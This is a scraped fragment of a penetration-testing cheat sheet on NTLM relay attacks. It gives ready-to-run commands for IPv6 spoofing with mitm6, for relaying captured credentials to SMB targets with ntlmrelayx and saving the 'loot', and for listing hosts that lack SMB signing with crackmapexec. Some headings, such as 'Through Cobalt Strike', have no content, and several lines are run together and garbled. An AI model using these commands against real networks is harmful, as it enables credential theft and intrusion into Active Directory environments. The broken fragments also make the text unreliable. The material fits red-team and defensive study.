802 B
802 B
-
Through Cobalt Strike:
-
Through .NET
-
MITM6 - Spoof IPv6 and relay requests to targets
mitm6 -d <domain.local>ntlmrelayx.py -6 -wh 192.168.1.1 -t smb://192.168.1.2 -l ~/tmp/-6specifies ipv6,-whspecifies where the WPAD file is hosted at (your IP usually).-tspecifies the target, or destination where the credentials will be relayed.-lis to where to store the loot.
-
Generate list of relay targets (SMB signing disabled)
cme smb scope.txt --gen-relay-list relay.txt
-
Basic NTLM Relay
impacket-ntlmrelayx -t <target> -smb2support- With targets file
impacket-ntlmrelayx -tf relay.txt -smb2support
-
NTLM Relay to AD CS HTTP Endpoints - see ADCS section